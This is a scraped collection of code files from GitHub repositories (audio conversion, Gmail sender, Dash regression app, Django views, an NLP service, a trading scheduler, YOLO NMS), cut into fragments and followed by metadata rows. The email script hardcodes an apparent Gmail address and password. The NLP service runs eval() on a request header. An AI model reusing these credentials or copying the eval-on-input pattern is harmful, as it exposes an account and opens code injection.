# Create wav duplicates for all the recordings in the Speech Accent Archive dataset.
recordings_per_language = speech_accent_archive_analysis.recordings_per_language()
custom_filesystem = CustomFilesystem()
print("Creating wav duplicates for the following files:")
for language, recordings in recordings_per_language.items():
for recording in recordings:
mp3_recording_path = custom_filesystem.mp3_recording_path(recording)
print(mp3_recording_path)
create_wav_duplicate(mp3_recording_path)
| albertojrigail/accented-speech-recognition | mp3-to-wav.py | mp3-to-wav.py | py | 1,112 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "custom_filesystem.WAV_EXTENSION",
"line_number": 10,
"usage_type": "name"
},
{
"api_name": "pydub.AudioSegment.from_mp3",
"line_number": 11,
"usage_type": "call"
},
{
"api_name": "pydub.AudioSegment",
"line_number": 11,
"usage_type": "name"
},
{
"ap... |
29656067370 | from cgitb import html
import smtplib
from email.message import EmailMessage
from string import Template
from pathlib import Path
html = Template(Path('index.html').read_text())
email = EmailMessage()
email['from'] = 'Gio Choa'
email['to'] = 'beautyhealthgojp@gmail.com'
email['subject'] = 'test in python'
email.set_content(html.substitute({'name': 'jacky'}), 'html')
with smtplib.SMTP(host='smtp.gmail.com', port=587) as smtp:
smtp.ehlo()
smtp.starttls()
smtp.login('giochoa0422@gmail.com', 'Faith3:16')
smtp.send_message(email)
print('message on the way') | giochoa/pythontest | emailwithpython/email_sender.py | email_sender.py | py | 582 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "cgitb.html",
"line_number": 7,
"usage_type": "name"
},
{
"api_name": "string.Template",
"line_number": 7,
"usage_type": "call"
},
{
"api_name": "pathlib.Path",
"line_number": 7,
"usage_type": "call"
},
{
"api_name": "email.message",
"line_number... |
39082569651 | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
import dash
import dash_core_components as dcc
import dash_html_components as html
from dash.dependencies import Input, Output
import plotly.express as px
import numpy as np
from sklearn.linear_model import LinearRegression
import pandas as pd
import plotly.graph_objects as go
from sklearn import svm
from sklearn.model_selection import train_test_split
from app import app
from app import server
## Correction et ajout variables
df = pd.read_csv("data/carData.csv")
svar = ('Year', 'Owner','Selling_Price', 'Present_Price', 'Kms_Driven')
vquanti = ('Selling_Price', 'Present_Price', 'Kms_Driven')
vquali = ('Car_Name','Year','Fuel_Type', 'Seller_Type', 'Transmission')
app.layout = html.Div([
html.Div([
html.Div([
html.H1(''' Analyse univariée ''')
]),
html.Div([
html.Div([
html.H2(''' Variables qualitatives '''),
html.Div([
html.Div('''Choisir une variable'''),
dcc.Dropdown(
id='vquali_choose',
options=[{'label': i, 'value': i} for i in vquali],
value='Year'
),
],
style={'width': '48%', 'display': 'inline-block'}),
dcc.Graph(id='univariate_quali'),
]),
html.Div([
html.H2(''' Variables quantitatives '''),
html.Div([
html.Div('''Choisir une variable'''),
dcc.Dropdown(
id='vquanti_choose',
options=[{'label': i, 'value': i} for i in vquanti],
value='Selling_Price'
),
],
style={'width': '48%', 'display': 'inline-block'}),
dcc.Graph(id='univariate_quanti'),
html.Div('''Les boxplots permettent de voir la répartition des données.
On voit d'un seul coup d'oeil où se situent le min, Q1, la médiane, Q3 et le max, ainsi que les valeurs extrêmes.
'''),
]),
], style={'columnCount': 2,}
),
],
),
html.Div([
html.H1(''' Regression linéaire et SVM'''),
html.Div([
html.Div([
html.Div([
html.Div('''Abscisse'''),
dcc.Dropdown(
id='xaxis-column',
options=[{'label': i, 'value': i} for i in svar],
value='Year'
),
],
style={'width': '48%', 'display': 'inline-block'}),
html.Div([
html.Div('''Ordonnée'''),
dcc.Dropdown(
id='yaxis-column',
options=[{'label': i, 'value': i} for i in vquanti],
value='Selling_Price'
),
],
style={'width': '48%', 'display': 'inline-block'}
),
]),
]),
html.Div([
html.Div([
html.H2(''' Regression linéaire univariée'''),
html.Div(''' N'ayant observé aucune différence entre les différentes méthodes de régression linéaire univariée, la regression ci-dessous a été réalisé avec sklearn.
'''),
dcc.Graph(id='linear'),
]),
html.Div([
html.H2(''' SVM '''),
dcc.Graph(id='svm'),
]),
],
style={'columnCount': 2,} ),
html.Div('''Différence entre regression linéaire univariée et SVR univariée : La SVR cherche a maximiser les marges.
Alors que la régression linéaire cherche à minimiser les erreurs.
'''),
]),
# html.Div([
# html.Div([
# html.H1('''Regression linéaire multiple'''),
# html.Div([
# ], id = 'regmulti' ),
# ]),
# ]),
html.Div('''Question bonus - Quelles données manque-il à votre analyse ? -
On pourrait regarder la date du contrôle technique et regarder s'il contient une ou plusieurs reparations à faire.
On peut aussi se demander à quelle série appartient la voiture ?
Est-ce que la voiture a t-elle été déjà accidentée ?
Est-ce que la courroie de distribution a t-elle été changée ?
...
Les données manquantes sont de ce fait, des données techniques sur la voiture.
'''),
])
## Callback
@app.callback(
Output('linear', 'figure'),
[Input('xaxis-column', 'value'),
Input('yaxis-column', 'value')])
def graph_reg(xvar, yvar):
x = df[xvar].values.reshape(-1, 1)
y = df[yvar].values
X_train, X_test, y_train, y_test = train_test_split(x, y, train_size=0.8, random_state=0)
model = LinearRegression().fit(x, y)
x_range = np.linspace(x.min(), x.max(), 100)
y_range = model.predict(x_range.reshape(-1, 1))
fig = go.Figure([
go.Scatter(x=X_train.squeeze(), y=y_train, name='train', mode='markers'),
go.Scatter(x=X_test.squeeze(), y=y_test, name='test', mode='markers'),
go.Scatter(x=x_range, y=y_range, name=('Y = %f.X + %f' %(model.coef_, model.intercept_)))
])
fig.update_xaxes(title=xvar)
fig.update_yaxes(title=yvar)
return fig
@app.callback(
Output('univariate_quali', 'figure'),
[Input('vquali_choose', 'value')])
def graph_quali(var):
fig = px.histogram(df, x=var)
return fig
@app.callback(
Output('univariate_quanti', 'figure'),
[Input('vquanti_choose', 'value')])
def graph_quanti(var):
fig = px.box(df, x=var)
return fig
@app.callback(
Output('svm', 'figure'),
[Input('xaxis-column', 'value'),
Input('yaxis-column', 'value')])
def graph_svm(xvar, yvar):
x = df[xvar].values.reshape(-1, 1)
y = df[yvar].values
X_train, X_test, y_train, y_test = train_test_split(x, y, train_size=0.8, random_state=0)
model = svm.SVR(kernel="linear").fit(x, y)
x_range = np.linspace(x.min(), x.max(), 100)
y_range = model.predict(x_range.reshape(-1, 1))
fig = go.Figure([
go.Scatter(x=X_train.squeeze(), y=y_train, name='train', mode='markers'),
go.Scatter(x=X_test.squeeze(), y=y_test, name='test', mode='markers'),
go.Scatter(x=x_range, y=y_range, name=('Y = %f.X + %f' %(model.coef_, model.intercept_)))
])
fig.update_xaxes(title=xvar)
fig.update_yaxes(title=yvar)
return fig
# @app.callback(Output('regmulti', 'children'))
# def graph_multi():
# data = pd.DataFrame(df, columns=['Year','Kms_Driven', 'Selling_Price']),
# col_transform = pd.DataFrame(df, columns=['Transmission'])
# dummies = pd.get_dummies(col_transform)
# xm = np.array(data.join(dummies))
# ym = df['Selling_Price'].values
# reg = LinearRegression().fit(xm, ym)
# print('Sklearn multiple - Coefficients:', reg.coef_)
# b1 = (reg.intercept_)
# return b1
####
if __name__ == '__main__':
app.run_server(debug=True)
| estellekayser/cars | index.py | index.py | py | 7,502 | python | fr | code | 0 | github-code | 36 | [
{
"api_name": "pandas.read_csv",
"line_number": 19,
"usage_type": "call"
},
{
"api_name": "app.app.layout",
"line_number": 25,
"usage_type": "attribute"
},
{
"api_name": "app.app",
"line_number": 25,
"usage_type": "name"
},
{
"api_name": "dash_html_components.Div"... |
26030345486 | import os
import sys
#モジュール探索パス追加
p = ['../','../../','../../../']
for e in p: sys.path.append(os.path.join(os.path.dirname(__file__),e))
import discord
import re
import requests
import database
class UserFunc():
def __init__(self) -> None:
pass
#入力されたフレンドコード(SW)の確認
def check_friendcode(self, friendcode:str) -> bool:
r = re.search(r"^\d{4}-\d{4}-\d{4}$",friendcode)
return bool(r)
#入力されたTwitterIDの確認
def check_twitterid(self, twitterid:str) -> bool:
r = re.search("^[0-9a-zA-Z_]{1,15}$",twitterid)
return bool(r)
class UserDBFunc():
def __init__(self) -> None:
self.db = database.Database()
#指定ユーザの情報取得
async def get_userdata(self, userid:str) -> list:
r = await self.db.get_db(name='read', table='user-master', column='DiscordID', record=str(userid))
ud = r.json()
return ud
#指定ユーザの情報送信
async def post_userdata(self, userid:str, postdata:dict, apptype:int) -> requests.Response:
r = await self.db.post_db(name='write', data=postdata, table='user-master', column='DiscordID', record=str(userid), apptype=apptype)
return r
#指定ユーザの情報送信をログ
async def log_userdata(self, author:discord.User, postdata:dict, currenttime:str, apptype:int) -> requests.Response:
datekey = ["登録日時", "最終更新日時"]
for k in datekey:
if k in postdata: del postdata[k]
add = {"タイムスタンプ":currenttime, "申請区分":apptype, "実行者Discord名": str(author), "実行者DiscordID": str(author.id)}
logdata = postdata|add
r = await self.db.post_db(name='log', data=logdata, table='user-log')
return r | rich-bread/bmdb_bot | menu/usermenu/cmfunc/userfunc.py | userfunc.py | py | 1,852 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "sys.path.append",
"line_number": 6,
"usage_type": "call"
},
{
"api_name": "sys.path",
"line_number": 6,
"usage_type": "attribute"
},
{
"api_name": "os.path.join",
"line_number": 6,
"usage_type": "call"
},
{
"api_name": "os.path",
"line_number": ... |
40885660668 | import json
import logging
import os.path
from importlib import import_module
from nlp_architect.utils.io import gzip_str
logger = logging.getLogger(__name__)
logger.setLevel(logging.DEBUG)
def format_response(resp_format, parsed_doc):
"""
Transform string of server's response to the requested format
Args:
resp_format(str): the desired response format
parsed_doc: the server's response
Returns:
formatted response
"""
logger.info('preparing response JSON')
ret = None
if (resp_format == "json") or ('json' in resp_format) or (not resp_format):
# if not specified resp_format then default is json
ret = parsed_doc
if resp_format == "gzip" or 'gzip' in resp_format:
ret = gzip_str(parsed_doc)
return ret
def parse_headers(req_headers):
"""
Load headers from request to dictionary
Args:
req_headers (dict): the request's headers
Returns:
dict: dictionary hosting the request headers
"""
headers_lst = ["CONTENT-TYPE", "CONTENT-ENCODING", "RESPONSE-FORMAT",
"CLEAN", "DISPLAY-POST-PREPROCCES",
"DISPLAY-TOKENS", "DISPLAY-TOKEN-TEXT", "IS-HTML"]
headers = {}
for header_tag in headers_lst:
if header_tag in req_headers:
headers[header_tag] = req_headers[header_tag]
else:
headers[header_tag] = None
return headers
def set_headers(res):
"""
set expected headers for request (CORS)
Args:
res (:obj:`falcon.Response`): the request
"""
res.set_header('Access-Control-Allow-Origin', '*')
res.set_header("Access-Control-Allow-Credentials", "true")
res.set_header('Access-Control-Allow-Methods', "GET,HEAD,OPTIONS,POST,PUT")
res.set_header('Access-Control-Allow-Headers',
"Access-Control-Allow-Headers, Access-Control-Allow-Origin,"
" Origin,Accept, X-Requested-With, Content-Type, "
"Access-Control-Request-Method, "
"Access-Control-Request-Headers, Response-Format, clean, "
"display-post-preprocces, display-tokens, "
"display-token-text")
def package_home(gdict):
"""
help function for running paths from out-of-class scripts
"""
filename = gdict["__file__"]
return os.path.dirname(filename)
def extract_module_name(model_path):
"""
Extract the module's name from path
Args:
model_path(str): the module's class path
Returns:
str: the modules name
"""
class_name = "".join(model_path.split(".")[0].title().split("_"))
return class_name
class Service(object):
"""Handles loading and inference using specific models"""
def __init__(self, service_name):
self.service_type = None
self.is_spacy = False
self.service = self.load_service(service_name)
def get_paragraphs(self):
return self.service.get_paragraphs()
# pylint: disable=eval-used
def get_service_inference(self, docs, headers):
"""
get parser response from service API
Args:
headers (list(str)): the headers of the request
docs: input received from the request
Returns:
the service API output
"""
logger.info('sending documents to parser')
response_data = []
for i, doc in enumerate(docs):
inference_doc = self.service.inference(doc["doc"])
if self.is_spacy is True:
parsed_doc = inference_doc.displacy_doc()
doc_dic = {"id": doc["id"], "doc": parsed_doc}
# Potentially a security risk
if headers['IS-HTML'] is not None and eval(headers['IS-HTML']):
# a visualizer requestadd type of service (core/annotate) to response
doc_dic["type"] = self.service_type
response_data.append(doc_dic)
else:
inference_doc['id'] = i + 1
response_data.append(inference_doc)
return response_data
def load_service(self, name):
"""
Initialize and load service from input given name, using "services.json" properties file
Args:
name (str):
The name of service to upload using server
Returns:
The loaded service
"""
with open(os.path.join(os.path.dirname(os.path.realpath(__file__)), "services.json")) \
as prop_file:
properties = json.load(prop_file)
folder_path = properties["api_folders_path"]
service_name_error = "'{0}' is not an existing service - " \
"please try using another service.".format(name)
if name in properties:
model_relative_path = properties[name]["file_name"]
else:
logger.error(service_name_error)
raise Exception(service_name_error)
if not model_relative_path:
logger.error(service_name_error)
raise Exception(service_name_error)
module_path = ".".join(model_relative_path.split(".")[:-1])
module_name = extract_module_name(model_relative_path)
module = import_module(folder_path + module_path)
class_api = getattr(module, module_name)
upload_service = class_api()
upload_service.load_model()
self.service_type = properties[name]["type"]
self.is_spacy = properties[name].get('spacy', False)
return upload_service
| IntelLabs/nlp-architect | server/service.py | service.py | py | 5,596 | python | en | code | 2,921 | github-code | 36 | [
{
"api_name": "logging.getLogger",
"line_number": 8,
"usage_type": "call"
},
{
"api_name": "logging.DEBUG",
"line_number": 9,
"usage_type": "attribute"
},
{
"api_name": "nlp_architect.utils.io.gzip_str",
"line_number": 29,
"usage_type": "call"
},
{
"api_name": "os... |
43013396871 |
"""
Purpose:
Date created: 2020-04-19
Contributor(s):
Mark M.
"""
from __future__ import print_function
from pyspark import SparkContext
# from pyspark.sql import SparkSession
# spark = SparkSession.builder.appName("test1").getOrCreate()
sc = SparkContext(appName="matrices1")
rdd = sc.parallelize([1, 2,])
sorted(rdd.cartesian(rdd).collect())
n = 10
rng = sc.range(1, n + 1)
sum_ = rng.sum()
print(f"The sum of the numbers from 1 to 10 is: {sum_}")
sc.stop() | MarkMoretto/project-euler | spark/spark_basics_1.py | spark_basics_1.py | py | 473 | python | en | code | 1 | github-code | 36 | [
{
"api_name": "pyspark.SparkContext",
"line_number": 17,
"usage_type": "call"
}
] |
7346608770 | # Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from django.core.urlresolvers import reverse
from django.utils.translation import ugettext_lazy as _
from horizon import exceptions
from horizon import forms
from horizon import messages
from openstack_dashboard.api import cinder
# This set of states was pulled from cinder's snapshot_actions.py
STATUS_CHOICES = (
('available', _('Available')),
('creating', _('Creating')),
('deleting', _('Deleting')),
('error', _('Error')),
('error_deleting', _('Error Deleting')),
)
def populate_status_choices(initial, status_choices):
current_status = initial.get('status')
status_choices = [status for status in status_choices
if status[0] != current_status]
status_choices.insert(0, ("", _("Select a new status")))
return status_choices
class UpdateStatus(forms.SelfHandlingForm):
status = forms.ChoiceField(label=_("Status"))
def __init__(self, request, *args, **kwargs):
super(UpdateStatus, self).__init__(request, *args, **kwargs)
initial = kwargs.get('initial', {})
self.fields['status'].choices = populate_status_choices(
initial, STATUS_CHOICES)
def handle(self, request, data):
try:
cinder.volume_snapshot_reset_state(request,
self.initial['snapshot_id'],
data['status'])
choices = dict(STATUS_CHOICES)
choice = choices[data['status']]
messages.success(request, _('Successfully updated volume snapshot'
' status: "%s".') % choice)
return True
except Exception:
redirect = reverse("horizon:admin:volumes:index")
exceptions.handle(request,
_('Unable to update volume snapshot status.'),
redirect=redirect)
| Mirantis/mos-horizon | openstack_dashboard/dashboards/admin/volumes/snapshots/forms.py | forms.py | py | 2,461 | python | en | code | 7 | github-code | 36 | [
{
"api_name": "django.utils.translation.ugettext_lazy",
"line_number": 25,
"usage_type": "call"
},
{
"api_name": "django.utils.translation.ugettext_lazy",
"line_number": 26,
"usage_type": "call"
},
{
"api_name": "django.utils.translation.ugettext_lazy",
"line_number": 27,
... |
39112390989 | import re
from django.http.response import HttpResponseServerError
from django.shortcuts import render, HttpResponse, redirect
from miapp.models import Article
from django.db.models import Q
from miapp.forms import FormArticle
from django.contrib import messages
# Create your views here.
#MVC = MOdelo Vista Controlador -> Acciones(Metodos)
#MVT = Modelo Template Vista -> Acciones(Metodos)
#Puedes hacerte una pequeña plantilla para navegar entre las vistas
layout = """
"""
#Crear tu primera vista q son funciones
def index(request):
nombre = 'Rene Adonay'
lenguajes = ['Python', 'Js', 'PHP', "C++", "C"]
years = 2021
rango = range(years, 2051)
return render(request, 'index.html', {
'title': 'Home Page',
'nombre': nombre,
'lenguajes': lenguajes,
'years': years,
'rango': rango
})
def hola_mundo(request): #el request es un parametro q me permite recibir datos de peticiones a esta url
#tienes q pasarle el parametro request a cada una de las funciones q hagas en views
#Aqui puedo usar 3comillas y hacer un html dentro de la funcion
return render(request,'hola_mundo.html')
def test(request, redirigir=0):
years = 2021
rango = range(years, 2051)
return render(request,'test.html',{
'years': years,
'rango': rango
})
def contacto(request, nombre="", apellidos=""):
return render(request,'contacto.html')
def crear_articulo(request, title, content, public):
articulo = Article(
title = title,
content = content,
public =public
)
articulo.save()
return HttpResponse(f"Articulo creado: {articulo.title} - {articulo.content} ")
def save_article(request):
if request.method == 'POST':
title = request.POST['title']
content = request.POST['content']
public = request.POST['public']
articulo = Article(
title = title,
content = content,
public =public
)
articulo.save()
return HttpResponse(f"Articulo creado: {articulo.title} - {articulo.content} ")
else:
return HttpResponse("<h2>No se ha podido Guardar nada</h2>")
return HttpResponse(f"Articulo creado: {articulo.title} - {articulo.content} ")
def create_article(request):
return render(request, 'create_article.html')
def create_full_article(request):
if request.method == 'POST':
formulario = FormArticle(request.POST)
if formulario.is_valid():
data_form = formulario.cleaned_data
title = data_form.get('title'),
content = data_form['content'],
public = data_form['public']
articulo = Article(
title = title ,
content = content ,
public =public
)
articulo.save()
#crear mensaje flash(secion q solo se muestra una vez)
messages.success(request, f'Has creado correctamente el articulo {articulo.id} ')
return redirect('Articulos')
#return HttpResponse(str(articulo.title) + str(articulo.content) + str(articulo.public))
else:
formulario = FormArticle()
return render(request, 'create_full_article.html', {
'form': formulario
})
def articulo(request):
articulo = Article.objects.get(title="Tercer_contenido")
return HttpResponse(f"Articulo: {articulo.id} - {articulo.title}")
def editar_articulo(request, id):
articulo = Article.objects.get(pk=id)
articulo.title = "Batman"
articulo.content = "Pelicula de DC el caballero de la noche"
articulo.public = True
articulo.save()
return HttpResponse(f"Articulo editado: {articulo.title} ")
def articulos(request):
articulos = Article.objects.all()
articulos = Article.objects.filter(public=True).order_by('-id')
"""articulos = Article.objects.filter()
articulos = Article.objects.filter(id__gte=10, title__contains="articulo")
articulos = Article.objects.filter(
title="articulo").exclude(public=True)
articulos = Article.objects.raw("SELECT * FROM miapp_article WHERE title='articulo2' AND public=1 ")
articulos = Article.objects.filter(
Q(title__contains="") | Q(title__contains="")
)
)"""
return render(request, 'articulos.html', {
'articulos': articulos
} )
def borrar_articulo(request, id):
articulo = Article.objects.get(pk=id)
articulo.delete()
return redirect('Articulos') | reneafranco/web-aplications | AprendiendoDjango/miapp/views.py | views.py | py | 4,619 | python | es | code | 0 | github-code | 36 | [
{
"api_name": "django.shortcuts.render",
"line_number": 28,
"usage_type": "call"
},
{
"api_name": "django.shortcuts.render",
"line_number": 39,
"usage_type": "call"
},
{
"api_name": "django.shortcuts.render",
"line_number": 47,
"usage_type": "call"
},
{
"api_name"... |
70077269545 | import numpy as np
import matplotlib.pyplot as plt
import pandas as pd
from sklearn.impute import SimpleImputer
from sklearn.compose import ColumnTransformer
from sklearn.preprocessing import OneHotEncoder, LabelEncoder
from sklearn.model_selection import train_test_split
def createDataSet():
data = pd.read_csv('Data.csv')
x = data.iloc[:, :-1].values
y = data.iloc[:, -1].values
return data, x, y
if __name__ == '__main__':
data, x, y = createDataSet()
imputer = SimpleImputer(missing_values=np.nan, strategy='mean')
imputer.fit(x[:, 1: 3])
print(x)
print()
x[:, 1:3] = imputer.transform(x[:, 1:3])
columnTrans = ColumnTransformer(transformers=[('encoder', OneHotEncoder(), [0])], remainder='passthrough')
print(x)
print()
x = np.array(columnTrans.fit_transform(x))
print(x)
le = LabelEncoder()
y = le.fit_transform(y)
xTrain , xTest, yTrain, yTest = train_test_split(x,y,test_size=0.2 )
| Chris-Haj/MachineLearning | MachineLearning/MLPrac.py | MLPrac.py | py | 967 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "pandas.read_csv",
"line_number": 11,
"usage_type": "call"
},
{
"api_name": "sklearn.impute.SimpleImputer",
"line_number": 19,
"usage_type": "call"
},
{
"api_name": "numpy.nan",
"line_number": 19,
"usage_type": "attribute"
},
{
"api_name": "sklearn.c... |
69842961063 |
from django.conf import settings
from . import models
from .clients.bezant import Client as BezantClient
def _issue_point_to_user(user, behaviour_code, amount=0, reason=None):
try:
behaviour = models.Behaviour.objects.get(code=behaviour_code)
except models.Behaviour.DoesNotExist:
return
behaviour.issue_point_to_user(user, amount, reason)
def issue_signup_point(user):
try:
if user.invited_by:
b = models.Behaviour.objects.get(code='signup_for_invitee')
else:
b = models.Behaviour.objects.get(code='signup')
except models.Behaviour.DoesNotExist:
return
qs = models.BehaviourPointLog.objects.filter(user=user, behaviour=b)
if qs.exists():
return
if user.invited_by:
_issue_point_to_user(
user,
'signup_for_invitee',
reason='invited_by_recommended_code',
)
_issue_point_to_user(
user.invited_by,
'signup_for_inviter',
reason='invite_user',
)
else:
_issue_point_to_user(user, 'signup')
def issue_login_point(user):
_issue_point_to_user(user, 'login')
def issue_follow_point(user, target_user):
if user == target_user:
return
if not user.following_set.filter(target=target_user).exists():
return
_issue_point_to_user(target_user, 'follow')
def issue_unfollow_point(user, target_user):
if user == target_user:
return
if user.following_set.filter(target=target_user).exists():
return
_issue_point_to_user(target_user, 'unfollow')
def issue_like_point(user, target):
# target == Post 인스턴스
if user == target.user:
return
if target.status != 'published':
return
if not target.like_set.filter(user=user).exists():
return
_issue_point_to_user(user, 'give-like')
_issue_point_to_user(target.user, 'take-like')
def issue_unlike_point(user, target):
# target == Post 인스턴스
if user == target.user:
return
if target.status != 'published':
return
if target.like_set.filter(user=user).exists():
return
_issue_point_to_user(user, 'give-unlike')
_issue_point_to_user(target.user, 'take-unlike')
def issue_comment_point(user, target):
# target == Post 인스턴스
if user == target.user:
return
if target.status != 'published':
return
_issue_point_to_user(user, 'comment')
def issue_posting_point(target):
# target == Post 인스턴스
_issue_point_to_user(target.user, 'posting')
def issue_unposting_point(target):
# target == Post 인스턴스
_issue_point_to_user(target.user, 'unposting')
try:
behaviour = models.Behaviour.objects.get(code='take-unlike')
except models.Behaviour.DoesNotExist:
return
likes = target.like_set.count()
if not likes:
return
amount = likes * behaviour.reward * likes
_issue_point_to_user(
target.user,
'take-unlike',
amount,
models.BehaviourPointLog.reasons.SUM_UNLIKE_POINT_BY_DELETED_POSTING,
)
def create_bezant_wallet(password: str) -> str:
client = BezantClient(
endpoint=settings.BEZANT_ENDPOINT,
apikey=settings.BEZANT_APIKEY,
)
result = client.create_wallet(password)
return result['message']['enrollmentID']
| friendlywhales/lineup-web | backend/currencies/tasks.py | tasks.py | py | 3,415 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "clients.bezant.Client",
"line_number": 126,
"usage_type": "call"
},
{
"api_name": "django.conf.settings.BEZANT_ENDPOINT",
"line_number": 127,
"usage_type": "attribute"
},
{
"api_name": "django.conf.settings",
"line_number": 127,
"usage_type": "name"
},
... |
22811835651 | from apscheduler.schedulers.background import BlockingScheduler
from model import Model
from tools.zlogging import loggers, post_trade_doc
from datetime import datetime
from threading import Thread
import time
class Instrument(Thread):
n_times_per_second = 10
N_BACKLOG_PERIODS = 3
def __init__(self, ticker, time_period, short_num_periods, num_periods, manager):
Thread.__init__(self)
## Book keeping
self.ticker = ticker
self.time_period = time_period
self.short_num_periods = short_num_periods
self.n_micros = int(1e6 / self.n_times_per_second)
self.model = Model(ticker = ticker, short_num_periods = short_num_periods, num_periods = num_periods)
self.manager = manager
self.logger = loggers[ticker]
self.state = "ACTIVE"
def scanner_job(self):
if self.ticker not in self.manager.trades and self.state == 'ACTIVE':
signal, features, direction, open_, close = self.model.is_trade(list(self.storage.data).copy())
cs = abs(close - open_) / (self.manager.tick_increments[self.ticker] / 5)
if signal and cs >= 10:
data = {
"historical" : list(self.storage.data),
"features" : features
}
self.manager.on_signal(direction = direction, quantity = 100000, symbol = self.ticker, prices = (open_, close), data = data.copy())
self.logger.info('JOB: Starting Manager')
self.blocker.resume_job('manager_job')
elif self.ticker in self.manager.trades:
self.manager.trades[self.ticker].post_data.append(self.storage.data[-1])
if self.ticker in self.manager.backlog:
idc = []
for i, trade in enumerate(self.manager.backlog[self.ticker]):
dt = datetime.now()
trade, close_time = trade
trade.post_data.append(self.storage.data[-1])
if int((dt - close_time).seconds / (60 * self.time_period)) == self.N_BACKLOG_PERIODS:
print('POSTING BACKLOG')
post_trade_doc(trade)
idc.append(i)
for idx in idc:
del self.manager.backlog[self.ticker][idx]
def manager_job(self):
if self.ticker in self.manager.trades:
self.manager.trades[self.ticker].on_period()
else:
self.logger.info('JOB: Stopping Manager')
self.blocker.pause_job('manager_job')
def microsecond_job(self, job_func, params):
micros = datetime.now().microsecond
while int(micros / self.n_micros) < self.n_times_per_second - 1:
job_func(*params)
micros = datetime.now().microsecond
time.sleep(1.0 / self.n_times_per_second)
def run(self):
## Scheduler to run
job_defaults = {
'coalesce': True,
'max_instances': 1
}
self.blocker = BlockingScheduler(job_defaults = job_defaults)
self.blocker.add_job(self.manager_job, 'cron', second='*', id='manager_job', next_run_time=None)
self.blocker.start()
def on_close(self):
self.blocker.shutdown()
self.join() | zQuantz/Logma | ibapi/instrument.py | instrument.py | py | 3,436 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "threading.Thread",
"line_number": 10,
"usage_type": "name"
},
{
"api_name": "threading.Thread.__init__",
"line_number": 17,
"usage_type": "call"
},
{
"api_name": "threading.Thread",
"line_number": 17,
"usage_type": "name"
},
{
"api_name": "model.Mod... |
14310771223 | """
Nazwa: nms.py
Opis: Końcowe przetwarzanie wyjść z modelu. Filtracja po pewności,
transformacja koordynatów ramek, NMS.
Autor: Bartłomiej Moroz
"""
import torch
import torchvision
def transform_bbox(bboxes: torch.Tensor) -> torch.Tensor:
"""
Transform bounding boxes from (x, y, w, h) into (x1, y1, x2, y2).
"""
new_bboxes = bboxes.new(bboxes.shape)
new_bboxes[..., 2:4] = bboxes[..., 2:4] / 2
new_bboxes[..., 0:2] = bboxes[..., 0:2] - new_bboxes[..., 2:4]
new_bboxes[..., 2:4] = bboxes[..., 0:2] + new_bboxes[..., 2:4]
return new_bboxes
def apply_confidence_threshold(
predictions: torch.Tensor, objectness_confidence: float
) -> torch.Tensor:
"""
Filter out predictions that are below objectness confidence threshold.
"""
return predictions[predictions[..., 4] > objectness_confidence, :]
def find_best_class(predictions: torch.Tensor) -> torch.Tensor:
"""
Find the best class for each prediction (highest class confidence),
multiply objectness by class confidence and save best class index
(instead of confidences of all classes).
(x1, y1, x2, y2, objectness, classes...) -> (x1, y1, x2, y2, final_confidence, class)
"""
# Get the most likely class for each bbox
max_conf_val, max_conf_idx = torch.max(predictions[..., 5:], dim=1)
max_conf_idx = max_conf_idx.unsqueeze(1)
# Final confidence = objectness * class confidence
predictions[..., 4] *= max_conf_val
# Ditch all classes in bbox, instead save best class idx
return torch.cat([predictions[..., :5], max_conf_idx], dim=1)
def non_maximum_suppression(x: torch.Tensor, iou: float) -> torch.Tensor:
"""
Perform Non Maximum Suppression for all predictions (all classes) in an image.
"""
# Non maximum suppression is performed per class
classes = torch.unique(x[..., 5])
results = x.new_empty(0, x.size(1))
for cls in classes:
# Get predictions containing this class
preds_of_class = x[x[..., 5] == cls]
# Sort by descending objectness confidence
_, sorted_indices = torch.sort(preds_of_class[..., 4], descending=True)
preds_of_class = preds_of_class[sorted_indices]
# NMS proper
result_indices = torchvision.ops.nms(
preds_of_class[..., :4], preds_of_class[..., 4], iou
)
preds_of_class = preds_of_class[result_indices]
results = torch.cat([results, preds_of_class], dim=0)
return results
def reduce_boxes(
predictions: torch.Tensor, confidence_threshold=0.3, iou=0.5, min_max_size=(2, 416)
) -> torch.Tensor:
"""
Given a batch of predictions, perform some transformations and reduce them to only the meaningful ones:
- filter out low objectness
- filter out too small or too big boxes
- transform (x, y, w, h) boxes into (x1, y1, x2, y2)
- find best class for each prediction
- filter out low objectness * class_confidence
- perform NMS
- prepend each prediction with image index in batch
Additionally, the batch is flattened from (batch_size, all_predictions, model_output_predictions) into (-1, final_prediction_shape).
Final prediction shape: (id_in_batch, x1, y1, x2, y2, final_confidence, class)
"""
all_results = predictions.new_empty(0, 7)
# Process every image separately, NMS can't be vectorized
for i, x in enumerate(predictions):
# Filter out low objectness results
x = apply_confidence_threshold(x, confidence_threshold)
# Filter out invalid box width/height
x = x[
((x[..., 2:4] > min_max_size[0]) & (x[..., 2:4] < min_max_size[1])).all(1)
]
if x.size(0) == 0:
continue
# Transform bbox from (x, y, w, h, ...) into (x1, y1, x2, y2, ...)
x[..., :4] = transform_bbox(x[..., :4])
# Choose and save the most probable class
x = find_best_class(x)
# Filter out low final confidence results
x = apply_confidence_threshold(x, confidence_threshold)
if x.size(0) == 0:
continue
# NMS
result_preds = non_maximum_suppression(x, iou)
# Add index in batch to all image predictions
indices_in_batch = result_preds.new(result_preds.size(0), 1).fill_(i)
result_preds_with_indices = torch.cat([indices_in_batch, result_preds], dim=1)
# Save results
all_results = torch.cat([all_results, result_preds_with_indices], dim=0)
return all_results
| The0Jan/GSN_YOLO | src/processing/nms.py | nms.py | py | 4,524 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "torch.Tensor",
"line_number": 12,
"usage_type": "attribute"
},
{
"api_name": "torch.Tensor",
"line_number": 24,
"usage_type": "attribute"
},
{
"api_name": "torch.Tensor",
"line_number": 25,
"usage_type": "attribute"
},
{
